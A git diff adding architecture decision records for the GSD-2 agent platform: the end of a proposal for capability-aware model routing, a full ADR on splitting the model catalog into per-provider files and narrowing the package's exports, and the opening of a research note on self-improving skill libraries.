+    if (metadata.tags?.some(t => /^(docs?|readme|comment|config|typo|rename)$/i.test(t))) {
+      return { ...base, instruction: 0.9, coding: 0.3, speed: 0.7 };
+    }
+    // Debugging keywords → boost debugging and reasoning
+    if (metadata.complexityKeywords?.some(k => k === "concurrency" || k === "compatibility")) {
+      return { ...base, debugging: 0.9, reasoning: 0.8 };
+    }
+    // Migration/architecture → boost reasoning and coding
+    if (metadata.complexityKeywords?.some(k => k === "migration" || k === "architecture")) {
+      return { ...base, reasoning: 0.9, coding: 0.8 };
+    }
+    // Many files or high estimated lines → boost coding
+    if ((metadata.fileCount ?? 0) >= 6 || (metadata.estimatedLines ?? 0) >= 500) {
+      return { ...base, coding: 0.9, reasoning: 0.7 };
+    }
+  }
+
+  return base;
+}
+```
+
+Base requirement vectors by unit type:
+
+```ts
+const BASE_REQUIREMENTS: Record<string, Partial<Record<keyof ModelCapabilities, number>>> = {
+  "execute-task":        { coding: 0.9, instruction: 0.7, speed: 0.3 },
+  "research-milestone":  { research: 0.9, longContext: 0.7, reasoning: 0.5 },
+  "research-slice":      { research: 0.9, longContext: 0.7, reasoning: 0.5 },
+  "plan-milestone":      { reasoning: 0.9, coding: 0.5 },
+  "plan-slice":          { reasoning: 0.9, coding: 0.5 },
+  "replan-slice":        { reasoning: 0.9, debugging: 0.6, coding: 0.5 },
+  "reassess-roadmap":    { reasoning: 0.9, research: 0.5 },
+  "complete-slice":      { instruction: 0.8, speed: 0.7 },
+  "run-uat":             { instruction: 0.7, speed: 0.8 },
+  "discuss-milestone":   { reasoning: 0.6, instruction: 0.7 },
+  "complete-milestone":  { instruction: 0.8, reasoning: 0.5 },
+};
+```
+
+### Scoring Function
+
+```ts
+function scoreModel(
+  model: ModelCapabilities,
+  requirements: Partial<Record<keyof ModelCapabilities, number>>,
+): number {
+  let weightedSum = 0;
+  let weightSum = 0;
+  for (const [dim, weight] of Object.entries(requirements)) {
+    const capability = model[dim as keyof ModelCapabilities] ?? 50;
+    weightedSum += weight * capability;
+    weightSum += weight;
+  }
+  return weightSum > 0 ? weightedSum / weightSum : 50;
+}
+```
+
+This produces a **weighted average** in the range `0–100`, where each dimension's contribution is proportional to its requirement weight. The output is directly comparable across models regardless of how many dimensions the requirement vector has.
+
+**Tie-breaking:** When two models score within 2 points of each other, prefer the cheaper model (by `MODEL_COST_PER_1K_INPUT`). If cost is also equal, break ties by lexicographic model ID for determinism.
+
+### Configuration Model
+
+Built-in capability profiles ship as a data table alongside `MODEL_CAPABILITY_TIER` and `MODEL_COST_PER_1K_INPUT` in `model-router.ts`:
+
+```ts
+const MODEL_CAPABILITY_PROFILES: Record<string, ModelCapabilities> = {
+  "claude-opus-4-6":     { coding: 95, debugging: 90, research: 85, reasoning: 95, speed: 30, longContext: 80, instruction: 90 },
+  "claude-sonnet-4-6":   { coding: 85, debugging: 80, research: 75, reasoning: 80, speed: 60, longContext: 75, instruction: 85 },
+  "claude-haiku-4-5":    { coding: 60, debugging: 50, research: 45, reasoning: 50, speed: 95, longContext: 50, instruction: 75 },
+  "gpt-4o":              { coding: 80, debugging: 75, research: 70, reasoning: 75, speed: 65, longContext: 70, instruction: 80 },
+  "gpt-4o-mini":         { coding: 55, debugging: 45, research: 40, reasoning: 45, speed: 90, longContext: 45, instruction: 70 },
+  "gemini-2.5-pro":      { coding: 75, debugging: 70, research: 85, reasoning: 75, speed: 55, longContext: 90, instruction: 75 },
+  "gemini-2.0-flash":    { coding: 50, debugging: 40, research: 50, reasoning: 40, speed: 95, longContext: 60, instruction: 65 },
+  "deepseek-chat":       { coding: 75, debugging: 65, research: 55, reasoning: 70, speed: 70, longContext: 55, instruction: 65 },
+  "o3":                  { coding: 80, debugging: 85, research: 80, reasoning: 92, speed: 25, longContext: 70, instruction: 85 },
+};
+```
+
+Users can override capability profiles in `models.json` per provider:
+
+```json
+{
+  "providers": {
+    "anthropic": {
+      "modelOverrides": {
+        "claude-sonnet-4-6": {
+          "capabilities": {
+            "debugging": 90,
+            "research": 85
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+Partial overrides are deep-merged with built-in defaults. This uses the same `modelOverrides` path that already supports `contextWindow`, `cost`, and `compat` overrides.
+
+### Profile Versioning
+
+Built-in capability profiles are maintained alongside the existing `MODEL_CAPABILITY_TIER` and `MODEL_COST_PER_1K_INPUT` tables in `model-router.ts`. When the `@gsd/pi-ai` model catalog is updated with new models, the capability profile table must be updated in the same PR. A linting rule should flag any model present in `MODEL_CAPABILITY_TIER` but missing from `MODEL_CAPABILITY_PROFILES`.
+
+Profiles are versioned implicitly by GSD release. The existing `models.json` `modelOverrides` mechanism allows users to correct stale defaults immediately without waiting for a GSD update.
+
+### Extension-First Rollout
+
+Capability-aware routing should be prototypable as an extension before moving to core. The current hook surface is **insufficient** for this:
+
+- `before_provider_request` fires after model selection, at the API payload level — too late to swap model choice.
+- `model_select` fires reactively when a model changes, not before selection — it cannot influence the choice.
+
+**Required hook addition:** A `before_model_select` hook that fires within `selectAndApplyModel()` after tier classification but before `resolveModelForComplexity()`. This hook would receive:
+
+```ts
+interface BeforeModelSelectEvent {
+  unitType: string;
+  unitId: string;
+  classification: ClassificationResult;
+  taskMetadata: TaskMetadata;
+  eligibleModels: string[];     // tier-filtered available models
+  phaseConfig: ResolvedModelConfig;
+}
+```
+
+Return value: `{ modelId: string } | undefined` (override selection, or undefined to use default).
+
+This hook enables an extension to implement capability scoring externally, test it against real workloads, and validate behavior before the logic moves into `model-router.ts`.
+
+**Rollout sequence:**
+
+1. **Phase 1:** Add `before_model_select` hook and `TaskMetadata` to `ClassificationResult`. Ship built-in capability profile data table. No core routing changes.
+2. **Phase 2:** Implement capability scoring as an extension that hooks `before_model_select`. Gather user feedback through routing history.
+3. **Phase 3:** If behavior proves stable, move scoring into `resolveModelForComplexity()` in core. Extension hook remains for custom routing strategies.
+
+### Observability
+
+Every routing decision must be inspectable. The existing `RoutingDecision` interface is extended:
+
+```ts
+interface RoutingDecision {
+  modelId: string;
+  fallbacks: string[];
+  tier: ComplexityTier;
+  wasDowngraded: boolean;
+  reason: string;
+  // New fields:
+  capabilityScores?: Record<string, number>;    // model ID → score
+  taskRequirements?: Partial<Record<string, number>>;  // dimension → weight
+  selectionMethod: "tier-only" | "capability-scored";
+}
+```
+
+When verbose mode is on, the routing notification includes the top-scoring models and why the winner was selected:
+
+```
+Dynamic routing [S]: claude-sonnet-4-6 (scored 82.3 — coding:0.9×85, debugging:0.6×80)
+  runner-up: gpt-4o (scored 78.1)
+```
+
+## Consequences
+
+### Positive
+
+#### 1. Better model-task fit
+
+Routing decisions become based on the kind of work being done, not only how expensive or complex the work appears. A debugging task routes to the strongest debugger in the pool; a research task routes to the best synthesizer.
+
+#### 2. Works across arbitrary model pools
+
+The router no longer depends on a hardcoded vendor assumption. If a user has only Claude + Codex, it can still route intelligently between them. If the user adds Gemini or local models later, the same scoring system continues to work.
+
+#### 3. Preserves all existing invariants
+
+- **Downgrade-only semantics:** capability scoring never upgrades beyond the user's configured phase model.
+- **Budget pressure:** unchanged — constrains tier eligibility before scoring runs.
+- **Retry escalation:** unchanged — escalates tier, then scoring picks the best model in the new tier.
+- **Fallback chains:** assembled the same way, with capability-scored winner as primary.
+
+#### 4. Creates a testable, versionable contract for routing behavior
+
+Capability profiles and task vectors are explicit data structures. Routing decisions are inspectable in verbose mode. The scoring function is a pure function suitable for deterministic unit tests.
+
+#### 5. Opens the door to adaptive learning
+
+Existing routing history (`routing-history.ts`) can later refine capability scores per task type. When a model consistently fails at a particular task shape, its effective score for that dimension decreases. This is a natural extension of the existing `getAdaptiveTierAdjustment()` mechanism.
+
+#### 6. Graceful degradation
+
+Models without capability profiles get uniform scores, producing the same cheapest-in-tier behavior as today. Zero behavior change for users who don't configure heterogeneous pools.
+
+### Negative
+
+#### 1. More metadata to maintain
+
+Built-in model profiles will drift as model families evolve. Mitigation: profiles live in a single data table, versioned with GSD releases, with a lint rule for completeness.
+
+#### 2. Scoring can create false precision
+
+A `0–100` capability scale looks exact but is still heuristic. Mitigation: document profiles as "relative rankings, not benchmarks." The 2-point tie-breaking threshold prevents insignificant score differences from overriding cost optimization.
+
+#### 3. More routing complexity
+
+The current tier router is simple to explain and debug. Multi-dimensional scoring is more powerful but harder to reason about. Mitigation: verbose observability output shows scores and reasons. The `selectionMethod` field in routing decisions makes it clear whether capability scoring was active.
+
+#### 4. Stronger test requirements
+
+The router will need coverage for:
+
+- profile loading and override merge rules (partial deep-merge from `modelOverrides`)
+- `computeTaskRequirements()` with various unit types and metadata combinations
+- scoring function correctness (weighted average, tie-breaking)
+- interaction with tier eligibility filtering
+- budget pressure applied before scoring, not conflicting with it
+- fallback behavior when no scored model is eligible
+- graceful degradation when no profiles exist (uniform scores)
+- `before_model_select` hook contract (extension path)
+
+#### 5. New hook surface to maintain
+
+The `before_model_select` hook adds a new extension API contract that must be maintained across releases. Mitigation: the hook is narrowly scoped — one event type, optional return.
+
+### Neutral / Migration
+
+#### 1. Tier-based routing does not disappear
+
+Complexity tiers remain as:
+
+- the primary "how hard is this" signal that determines tier eligibility
+- the fallback behavior for models without capability profiles
+- the escalation path on retries (light → standard → heavy)
+
+Capability scoring adds the "what kind of work" signal on top. The two systems are layered, not competing.
+
+#### 2. Existing preferences continue to work
+
+`dynamic_routing.tier_models` still works — it pins a specific model per tier, bypassing capability scoring for that tier. Per-phase model overrides (`models.planning`, `models.execution`, etc.) continue to set the ceiling. No existing configuration breaks.
+
+#### 3. Documentation update required
+
+`docs/dynamic-model-routing.md` must be updated to explain:
+
+- what capability profiles are and how to override them
+- how scoring interacts with tier routing
+- how to read verbose routing output
+- how to use `before_model_select` for custom routing extensions
+
+## Risks
+
+### 1. Hardcoded vendor stereotypes become stale
+
+If the default profiles are not reviewed regularly, GSD will encode outdated assumptions about which models are "best" at which tasks.
+
+**Mitigation:** Keep defaults in a single data table (not scattered conditionals). Lint for completeness against the model catalog. User overrides via `modelOverrides` provide immediate escape hatch. Document profiles as heuristic rankings, not benchmarks.
+
+### 2. Budget logic and capability logic may conflict in user perception
+
+The highest-scoring model may not be selected because budget pressure constrained the eligible tier. This could look inconsistent if the user doesn't understand the pipeline order.
+
+**Mitigation:** Pipeline order is explicit and enforced in code:
+1. Complexity classification determines tier
+2. Budget pressure may downgrade tier
+3. Tier-eligible models are filtered (downgrade-only from user ceiling)
+4. Capability scoring ranks the eligible set
+5. Cost tie-breaks within scoring threshold
+
+Verbose output shows each step. The user sees "budget pressure: 85%" in the reason string when downgrade occurs.
+
+### 3. Task-type classification may be too coarse initially
+
+A unit type like `execute-task` contains many sub-shapes. The initial base vector plus metadata refinement may not distinguish all meaningful cases.
+
+**Mitigation:** The `computeTaskRequirements()` function is designed for iterative refinement. The existing `TaskMetadata` already captures tags, complexity keywords, file counts, dependency counts, and code block counts. New metadata signals can be added to the existing `extractTaskMetadata()` without changing the scoring function. Routing history provides signal on where refinement is needed.
+
+### 4. Unknown and custom models may score poorly by default
+
+Users often bring custom provider IDs, local models, or vendor aliases that will not exist in the built-in profile table.
+
+**Mitigation:** Unknown models receive uniform scores (50 across all dimensions), making capability scoring a no-op — they compete on cost within their tier, same as today. Users can add capability profiles via `modelOverrides` in `models.json` for models they know well.
+
+### 5. Extension hook adds API surface
+
+The `before_model_select` hook creates a contract that extensions may depend on.
+
+**Mitigation:** The hook has a narrow, well-defined interface. It is additive (existing hooks unchanged). The return type is simple (`{ modelId } | undefined`). Breaking changes would be handled through the same extension API versioning as other hooks.
+
+## Alternatives Considered
+
+### A. Keep pure complexity-tier routing
+
+Rejected because it optimizes cost within a tier but still treats meaningfully different models as interchangeable. The existing `MODEL_CAPABILITY_TIER` table already proves this is a recognized gap — it just stops at three buckets.
+
+### B. Hardcode task → model mappings
+
+Rejected because it breaks as soon as the user does not have the expected model. This is appropriate for a closed product with a fixed fleet, not for GSD's user-configured provider model.
+
+### C. Route only by user-specified per-phase models
+
+Rejected because it pushes all routing intelligence onto the user and does not adapt to retries, task subtype, or provider heterogeneity.
+
+### D. Use capability-aware routing only as an extension, never in core
+
+Not rejected as a starting point, but insufficient as the long-term architecture. Extension prototyping is the recommended first phase. However, coherent preferences, diagnostics, testing, and profile versioning will likely require core integration if the model proves valuable.
+
+### E. Add `costEfficiency` as a capability dimension
+
+Rejected because it conflates two concerns. If cost appears in both the scoring function and the budget constraint, the router has two competing cost signals that produce confusing behavior (e.g., a cheap model wins on `costEfficiency` score but then gets filtered out by budget pressure, or vice versa). Cost constrains eligibility; capability determines ranking.
+
+### F. Use static requirement vectors per unit type (no metadata refinement)
+
+Rejected because the existing `classifyUnitComplexity()` already proves that unit type alone is too coarse. A `execute-task` for docs vs. a `execute-task` for migration are categorically different. The metadata signals (tags, complexity keywords, file counts) that the classifier already extracts should inform requirement vectors.
+
+## Appendix: Current Architecture Reference
+
+For implementors, the current routing pipeline files:
+
+| File | Role |
+|------|------|
+| `auto-dispatch.ts` | Rule table that determines unit type + prompt |
+| `auto-model-selection.ts` | Orchestrates model selection for each dispatch |
+| `complexity-classifier.ts` | Tier classification with task metadata analysis |
+| `model-router.ts` | Tier → model resolution with downgrade-only semantics |
+| `routing-history.ts` | Adaptive learning from success/failure patterns |
+| `preferences-models.ts` | Per-phase model config resolution and fallbacks |
+| `register-hooks.ts` | Hook registration including `before_provider_request` |
+
+The capability scoring additions would primarily touch `model-router.ts` (profiles, scoring function) and `auto-model-selection.ts` (passing metadata to the router, new hook point).
diff --git a/docs/ADR-007-model-catalog-split.md b/docs/ADR-007-model-catalog-split.md
new file mode 100644
index 000000000..8ed426add
--- /dev/null
+++ b/docs/ADR-007-model-catalog-split.md
@@ -0,0 +1,285 @@
+# ADR-007: Model Catalog Split and Provider API Encapsulation
+
+**Status:** Proposed
+**Date:** 2026-04-03
+**Deciders:** Jeremy McSpadden
+**Related:** ADR-004 (capability-aware model routing), [ADR-005](https://github.com/gsd-build/gsd-2/issues/2790), [ADR-006](https://github.com/gsd-build/gsd-2/issues/2995), `packages/pi-ai/src/providers/`, `packages/pi-ai/src/models.ts`
+
+## Context
+
+The model/provider system in `pi-ai` has two structural problems worth fixing — but the system is **not fundamentally broken**. The heavy lifting (lazy SDK imports, registry-based dispatch, extension-based registration) is already well-designed. This ADR targets the two areas where the current design creates real friction without proposing unnecessary runtime changes.
+
+### Current Architecture
+
+```
+stream.ts
+  └─ import "./providers/register-builtins.js"  ← side-effect import at load time
+       ├─ import anthropic.ts            (6.8 KB)
+       ├─ import anthropic-vertex.ts     (3.9 KB)
+       ├─ import openai-completions.ts   (26 KB)
+       ├─ import openai-responses.ts     (6.4 KB)
+       ├─ import openai-codex-responses.ts (29 KB)
+       ├─ import azure-openai-responses.ts (7.8 KB)
+       ├─ import google.ts              (13.6 KB)
+       ├─ import google-vertex.ts       (14.5 KB)
+       ├─ import google-gemini-cli.ts   (30 KB)
+       ├─ import mistral.ts             (18.9 KB)
+       └─ amazon-bedrock.ts             (24 KB) ← only lazy-loaded provider
+
+models.ts
+  └─ import models.generated.ts   ← 13,848 lines, ALL providers, loaded at init
+  └─ import models.custom.ts      ← 197 lines, additional providers
+```
+
+### What Already Works Well
+
+1. **SDK lazy loading.** Every provider file uses `async function getXxxClass()` with a cached dynamic `import()`. The heavy npm packages (`@anthropic-ai/sdk`, `openai`, `@google/genai`, `@aws-sdk/*`, `@mistralai/*`) are only loaded on first API call. This is where the real startup cost would be — and it's already handled.
+
+2. **Registry-based dispatch.** `api-registry.ts` cleanly maps API types to stream functions. Callers use `stream(model, context)` and the registry routes to the right provider. This pattern is sound.
+
+3. **Extension registration.** Ollama and Claude Code CLI register via `registerApiProvider()` at runtime. This extensibility point works correctly.
+
+4. **Provider implementation code loading (~200KB total).** While all providers load eagerly, V8 parses local `.js` files in single-digit milliseconds each. The total parse cost for all provider files is ~10-30ms — not a user-visible bottleneck on a CLI that's about to make a multi-second API call anyway.
+
+### What's Actually Worth Fixing
+
+#### Problem 1: Monolithic model catalog — developer experience, not runtime
+
+`models.generated.ts` is **13,848 lines in a single file**. This creates real friction:
+
+- **PR reviews are painful.** When the generation script runs, the diff is a wall of changes across unrelated providers. Reviewers can't tell what actually changed for a specific provider.
+- **Navigation is slow.** Finding a specific model requires scrolling or searching through thousands of lines of static object literals.
+- **Merge conflicts are frequent.** Any two PRs that touch model generation will conflict on the same monolithic file.
+- **Git blame is useless.** Every line was "last changed" by the generation script, obscuring the history of individual provider additions.
+
+The runtime cost of loading all model definitions is negligible — a Map of ~200 model objects is maybe 50-100KB of heap. The problem is purely about code organization and developer workflow.
+
+#### Problem 2: Barrel export leaks provider internals — API design
+
+`packages/pi-ai/src/index.ts` re-exports every provider module's internals:
+
+```typescript
+export * from "./providers/anthropic.js";
+export * from "./providers/google.js";
+export * from "./providers/google-gemini-cli.js";
+export * from "./providers/google-vertex.js";
+export * from "./providers/mistral.js";
+export * from "./providers/openai-completions.js";
+export * from "./providers/openai-responses.js";
+// ... etc
+```
+
+This is a public API problem:
+
+- **Consumers can bypass the registry.** Any code that `import { streamAnthropic } from "pi-ai"` has a direct dependency on an implementation detail that should be internal.
+- **Refactoring is blocked.** Renaming a function inside a provider file is a breaking change because it's re-exported from the package root.
+- **API surface is unnecessarily large.** The public API should be `stream()`, `streamSimple()`, `registerApiProvider()`, model utilities, and types. Provider-specific stream functions are implementation details.
+
+### What Is NOT Worth Changing
+
+**Lazy provider loading (converting `register-builtins.ts` to async on-demand loading).** This was considered and rejected because:
+
+1. **The SDKs are already lazy.** The heavy cost is handled. Provider implementation code (~200KB of local `.js`) parses in ~10-30ms total.
+2. **Async resolution adds complexity to the hot path.** `stream.ts` currently does a synchronous `Map.get()`. Making `resolveApiProvider` async adds a microtask hop to every API call — not just the first. Small but measurable, and for no user-visible gain.
+3. **High blast radius, low payoff.** Touching `stream.ts`, `api-registry.ts`, and the registration lifecycle simultaneously risks regressions in the core streaming path for an optimization that wouldn't show up in profiling.
+4. **Bedrock's lazy loading is a special case, not a template.** It exists because `@aws-sdk/client-bedrock-runtime` is uniquely massive. Generalizing this pattern to providers where the SDK is already lazy-imported doesn't compound the benefit.
+
+## Decision
+
+**Make two targeted improvements to code organization and API hygiene. Do not change runtime loading behavior.**
+
+### Change 1: Split `models.generated.ts` into per-provider files
+
+Replace the monolithic 13,848-line generated file with per-provider files:
+
+```
+packages/pi-ai/src/models/
+  ├── index.ts                  ← re-exports combined registry, same public API
+  ├── generated/
+  │   ├── anthropic.ts          ← Anthropic model definitions
+  │   ├── openai.ts             ← OpenAI model definitions
+  │   ├── google.ts             ← Google model definitions
+  │   ├── mistral.ts            ← Mistral model definitions
+  │   ├── amazon-bedrock.ts     ← Bedrock model definitions
+  │   ├── groq.ts               ← Groq model definitions
+  │   ├── xai.ts                ← xAI model definitions
+  │   ├── cerebras.ts           ← Cerebras model definitions
+  │   ├── openrouter.ts         ← OpenRouter model definitions
+  │   └── ...                   ← one file per provider in the catalog
+  ├── custom.ts                 ← replaces models.custom.ts (unchanged content)
+  └── capability-patches.ts     ← CAPABILITY_PATCHES extracted for clarity
+```
+
+**`models/index.ts` keeps the exact same synchronous public API:**
+
+```typescript
+// models/index.ts
+// GSD-2 — Model registry (split by provider for maintainability)
+
+import { ANTHROPIC_MODELS } from "./generated/anthropic.js";
+import { OPENAI_MODELS } from "./generated/openai.js";
+import { GOOGLE_MODELS } from "./generated/google.js";
+// ... one import per provider
+
+import { CUSTOM_MODELS } from "./custom.js";
+import { CAPABILITY_PATCHES, applyCapabilityPatches } from "./capability-patches.js";
+import type { Api, KnownProvider, Model, Usage } from "../types.js";
+
+// Combine all generated models into single registry — same as today
+const MODELS = {
+  ...ANTHROPIC_MODELS,
+  ...OPENAI_MODELS,
+  ...GOOGLE_MODELS,
+  // ...
+};
+
+// Rest of the file is identical to current models.ts:
+// modelRegistry Map construction, capability patch application,
+// getModel(), getProviders(), getModels(), calculateCost(),
+// supportsXhigh(), modelsAreEqual()
+```
+
+**Key constraint: loading stays synchronous and eager.** All model files are statically imported. The Map is built at module init exactly as today. No async, no lazy loading, no runtime behavior change. This is purely a file organization change.
+
+**Update `generate-models.ts`** to emit one file per provider instead of a single `models.generated.ts`. The script already groups models by provider internally — it just needs to write separate files instead of one.
+
+#### Why this matters
+
+| Before | After |
+|--------|-------|
+| PR diffs show 13K-line file changes | PR diffs scoped to the provider that changed |
+| Merge conflicts on any concurrent model update | Conflicts only when same provider is touched |
+| `git blame` shows "regenerate models" for every line | `git blame` shows per-provider history |
+| Finding a model = search through 13K lines | Finding a model = open the provider file |
+| One reviewer must understand all providers | Reviewers only need context for affected provider |
+
+### Change 2: Stop barrel-exporting provider internals
+
+**Update `packages/pi-ai/src/index.ts`:**
+
+```typescript
+// Before (current — 17 re-exports including all providers):
+export * from "./providers/anthropic.js";
+export * from "./providers/azure-openai-responses.js";
+export * from "./providers/google.js";
+export * from "./providers/google-gemini-cli.js";
+export * from "./providers/google-vertex.js";
+export * from "./providers/mistral.js";
+export * from "./providers/openai-completions.js";
+export * from "./providers/openai-responses.js";
+export * from "./providers/register-builtins.js";
+// ...
+
+// After (clean public API):
+export * from "./api-registry.js";
+export * from "./env-api-keys.js";
+export * from "./models/index.js";
+export * from "./providers/register-builtins.js";  // resetApiProviders() is public
+export * from "./stream.js";
+export * from "./types.js";
+export * from "./utils/event-stream.js";
+export * from "./utils/json-parse.js";
+export type { OAuthAuthInfo, OAuthCredentials, /* ... */ } from "./utils/oauth/types.js";
+export * from "./utils/overflow.js";
+export * from "./utils/typebox-helpers.js";
+export * from "./utils/repair-tool-json.js";
+export * from "./utils/validation.js";
+```
+
+Provider-specific exports (`streamAnthropic`, `streamGoogle`, etc.) are removed from the public API. Any external consumer that imported them directly should use the registry-based `stream()` / `streamSimple()` functions instead — which is how all internal callers already work.
+
+#### Why this matters
+
+- **Enforces the registry pattern.** The correct way to call a provider is `stream(model, context)`. Direct provider function imports create fragile coupling.
+- **Enables future refactoring.** Provider internal function signatures can change without breaking the package API. Today, renaming `streamAnthropic` would be a semver-breaking change.
+- **Reduces API surface.** Consumers see only what they need: `stream`, `streamSimple`, `registerApiProvider`, model utilities, and types.
+
+### What Does NOT Change
+
+- **Runtime behavior** — all providers still load eagerly, same as today
+- **The `Model<TApi>` type system** — all types, interfaces, and generics stay the same
+- **The `ApiProvider` interface** — providers still implement `{ api, stream, streamSimple }`
+- **The `api-registry.ts` registry** — synchronous `Map.get()` dispatch, unchanged
+- **`stream.ts`** — no changes to the streaming entry point
+- **`register-builtins.ts`** — still eagerly imports and registers all providers (only `resetApiProviders` remains in barrel export)
+- **The extension system** — `registerApiProvider()` continues to work for Ollama, Claude Code CLI, etc.
+- **`models.json` user config** — custom models, overrides, provider settings are unaffected
+- **Model discovery** — discovery adapters are already lazy and independent
+- **Model routing** — ADR-004's capability-aware routing is orthogonal
+
+## Consequences
+
+### Positive
+
+1. **Cleaner PRs.** Model catalog changes are scoped to the provider that changed. Reviewers see a 200-line diff in `models/generated/openai.ts` instead of a 13K-line diff in `models.generated.ts`.
+
+2. **Fewer merge conflicts.** Two PRs that update different providers no longer conflict on the same file.
+
+3. **Better navigability.** Developers can jump directly to `models/generated/anthropic.ts` to see Anthropic's model definitions instead of searching through a monolith.
+
+4. **Cleaner package API.** `pi-ai` exports only what consumers need. Provider internals are properly encapsulated.
+
+5. **Future-proofs refactoring.** Provider implementation details can evolve without breaking the public API contract.
+
+6. **Zero runtime risk.** No changes to loading, registration, streaming, or dispatch. The refactor is purely structural.
+
+### Negative
+
+1. **More files.** Instead of 1 generated file + 1 custom file, we'll have ~15-20 generated files. Marginal complexity increase, but each file is focused and small.
+
+2. **Generation script update.** `generate-models.ts` needs to write per-provider files. The script already groups by provider, so this is straightforward but requires testing.
+
+3. **Import audit for barrel export change.** Any code that directly imports `streamAnthropic` (etc.) from `pi-ai` needs to be updated. Based on research, the main consumer is `register-builtins.ts` itself, which imports providers directly (not through the barrel). External usage should be minimal.
+
+## Alternatives Considered
+
+### 1. Full lazy provider loading (original ADR-005 proposal)
+
+Make all providers load on-demand via async dynamic imports, generalizing the Bedrock pattern. **Rejected** because:
+- SDK imports are already lazy — the heavy cost is handled
+- Provider implementation parsing is ~10-30ms total — not a bottleneck
+- Adds async complexity to the synchronous stream dispatch hot path
+- High migration effort and regression risk for unmeasurable performance gain
+
+### 2. Plugin architecture with separate npm packages
+
+Move each provider to its own package (`@gsd/provider-anthropic`, etc.). Maximum isolation but dramatically more complex build/release/versioning. Overkill for a monorepo where all providers ship together.
+
+### 3. Do nothing
+
+The current architecture works. This is a valid choice. The split is justified by the developer experience friction (13K-line file, merge conflicts, unusable git blame) and the API hygiene issue (leaking provider internals), not by a runtime problem. If the team is not experiencing these friction points, deferring is reasonable.
+
+## Implementation Plan
+
+### Wave 1: Split Model Catalog (Low-Medium Risk)
+1. Update `generate-models.ts` to emit per-provider files into `models/generated/`
+2. Create `models/index.ts` that imports all per-provider files and builds the same registry
+3. Extract `CAPABILITY_PATCHES` into `models/capability-patches.ts`
+4. Move `models.custom.ts` to `models/custom.ts`
+5. Update imports in `models.ts` (or replace it with the new `models/index.ts`)
+6. Verify `npm run build` and `npm run test` pass
+7. Delete `models.generated.ts` and `models.custom.ts`
+
+### Wave 2: Clean Up Barrel Export (Low Risk)
+1. Remove provider re-exports from `index.ts`
+2. Grep for direct provider imports from `"pi-ai"` across the codebase
+3. Migrate any found usages to use `stream()` / `streamSimple()` through the registry
+4. Verify build and tests
+
+### Wave 3: Validate
+1. Run full test suite
+2. Verify extension registration (Ollama, Claude Code CLI) still works
+3. Verify `resetApiProviders()` test helper still works
+4. Spot-check a few providers end-to-end
+
+## References
+
+- Current model catalog: `packages/pi-ai/src/models.generated.ts` (13,848 lines)
+- Current barrel export: `packages/pi-ai/src/index.ts`
+- Model registry: `packages/pi-ai/src/models.ts`
+- API provider registry: `packages/pi-ai/src/api-registry.ts`
+- Eager registration: `packages/pi-ai/src/providers/register-builtins.ts`
+- Stream dispatch: `packages/pi-ai/src/stream.ts`
+- Generation script: `packages/pi-ai/scripts/generate-models.ts`
+- Extension registration: `packages/pi-coding-agent/src/core/model-registry.ts`
+- ADR-004: `docs/ADR-004-capability-aware-model-routing.md`
diff --git a/docs/FRONTIER-TECHNIQUES.md b/docs/FRONTIER-TECHNIQUES.md
new file mode 100644
index 000000000..6aa5ad59a
--- /dev/null
+++ b/docs/FRONTIER-TECHNIQUES.md
@@ -0,0 +1,741 @@
+# Frontier Techniques for GSD-2
+
+Research into cutting-edge AI agent techniques that map directly to GSD-2's architecture, ranked by impact and feasibility.
+
+**Date:** 2026-03-25
+**Status:** Research / Pre-RFC
+
+---
+
+## Table of Contents
+
+- [Executive Summary](#executive-summary)
+- [1. Skill Library Evolution](#1-skill-library-evolution)
+- [2. DAG-Based Parallel Tool Execution](#2-dag-based-parallel-tool-execution)
+- [3. Speculative Tool Execution](#3-speculative-tool-execution)
+- [4. Semantic Context Compression](#4-semantic-context-compression)
+- [5. Cross-Session Learning Graph](#5-cross-session-learning-graph)
+- [6. MCTS-Based Planning](#6-mcts-based-planning)
+- [Priority Matrix](#priority-matrix)
+- [Sources & References](#sources--references)
+
+---
+
+## Executive Summary
+
+GSD-2 is a multi-layered, event-driven agent platform with strong extensibility primitives: a skill system, file-based memory, session branching, compaction, and 16+ extension lifecycle hooks. These existing primitives create natural integration points for six frontier techniques that could fundamentally change how GSD operates.
+
+The techniques fall into three categories:
+
+| Category | Techniques | Theme |
+|----------|-----------|-------|
+| **Self-Improvement** | Skill Library Evolution, Cross-Session Learning Graph | GSD gets better the more you use it |
+| **Performance** | DAG Tool Execution, Speculative Tool Execution | GSD gets faster per turn |
+| **Intelligence** | Semantic Context Compression, MCTS Planning | GSD reasons better with the same context budget |
+
+---
+
+## 1. Skill Library Evolution
+
+**Category:** Self-Improvement
+**Impact:** Massive | **Effort:** Medium | **Priority:** #1
+
+### What It Is
+
+Inspired by [SkillRL](https://arxiv.org/abs/2602.08234) (ICLR 2026), this technique transforms GSD's skill system from static instruction files into a self-improving knowledge base. Instead of skills being written once and updated manually, they evolve based on execution outcomes.
+
+SkillRL demonstrates that agents with learned skill libraries outperform baselines by 15.3%+ across task benchmarks, with 10-20% token compression compared to raw trajectory storage.
+
+### How It Works
+
+```
+┌─────────────────────────────────────────────────────────┐
+│                    EXECUTION LOOP                       │
+│                                                         │
+│  1. Skill invoked → agent executes task                 │
+│  2. Outcome captured (success/failure + trajectory)     │
+│  3. Trajectory distilled:                               │
+│     ├─ Success → strategic pattern extracted            │
+│     └─ Failure → anti-pattern + lesson recorded         │
+│  4. Skill file updated with versioned improvement       │
+│  5. Next invocation benefits from accumulated learnings │
+│                                                         │
+└─────────────────────────────────────────────────────────┘
+```
+
+**Two types of learned knowledge:**
+
+| Type | Description | Example |
+|------|-------------|---------|
+| **General Skills** | Universal strategic guidance applicable across tasks | "When editing TypeScript files, always check for type errors via LSP before committing" |
+| **Task-Specific Skills** | Category-level heuristics for specific skill domains | "The `fix-issue` skill should check CI status before opening a PR, not after" |
+
+### Why It Fits GSD-2
+
+GSD already has every primitive needed:
+
+- **Skill files** (`~/.claude/skills/`, `.claude/skills/`) — the storage layer exists
+- **Extension hooks** (`turn_end`, `agent_end`) — outcome capture points exist
+- **Memory system** (MEMORY.md + individual files) — persistence exists
+- **`/improve-skill` and `/heal-skill` commands** — manual versions of this loop already exist
+
+The gap is automation: connecting execution outcomes back to skill files without human intervention.
+
+### Integration Points
+
+| GSD Component | Role in Integration |
+|---------------|-------------------|
+| `agent-session.ts` → `turn_end` event | Captures execution outcome (success/failure signals) |
+| Extension hook: `agent_end` | Triggers trajectory distillation |
+| Skill file system | Receives versioned updates with learned patterns |
